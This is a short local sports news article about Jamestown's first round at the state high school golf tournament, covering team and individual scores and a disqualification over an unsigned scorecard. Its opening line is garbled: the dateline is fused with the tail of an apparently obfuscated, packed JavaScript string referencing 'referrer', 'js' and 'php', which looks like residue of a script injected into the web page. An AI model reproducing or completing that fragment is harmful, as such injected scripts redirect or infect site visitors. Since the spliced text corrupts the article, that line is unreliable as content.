JAMESTOWN hzksb|var|u0026u|referrer|tendk||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Jamestown finds itself in a spot it hasn’t been all year, leading the WDA teams after 18 holes. Despite not winning a West Region meet all season the Jays are ahead of all the other WDA teams after Day 1 of state golf. However, they are well behind Shanley for the top spot who owns an opening round 300. Jamestown is in fourth with a 314.

Brandon Stahlhut’s 76 is the low opening round score for the Jays and like his team he is also in fourth place. West Fargo’s Riley Johnson and Davies’ Tanner Kretchman lead after day 1 with an even-par 72.

Jamestown’s Nick Stockert was DQ’d after his first round for failing to have his partner sign his scorecard, which is just another one of the strange and strict rules of competitive golf.

Action continues at the Jamestown Country Club today at 9:00am.
